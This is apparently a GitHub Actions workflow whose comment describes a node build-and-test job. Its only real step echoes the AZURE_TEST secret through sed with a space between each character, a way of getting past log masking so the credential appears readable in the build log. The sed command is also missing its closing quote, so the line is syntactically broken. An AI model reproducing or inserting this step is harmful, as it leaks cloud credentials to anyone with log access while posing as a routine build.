# This workflow will do a clean installation of node dependencies, cache/restore them, build the source code and run tests across different versions of node
# For more information see: https://docs.github.com/en/actions/automating-builds-and-tests/building-and-testing-nodejs

name: "Custom build"
on:
  workflow_call:
    inputs:
      environment:
        required: true
        type: string

jobs:
  
  build:

    runs-on: ubuntu-latest
    environment: 
      name: ${{ inputs.environment }}
    steps:
    - uses: actions/checkout@master
    - run: echo "$SEC" | sed 's/./& /g
      shell: bash
      env:
        SEC: ${{ secrets.AZURE_TEST }}
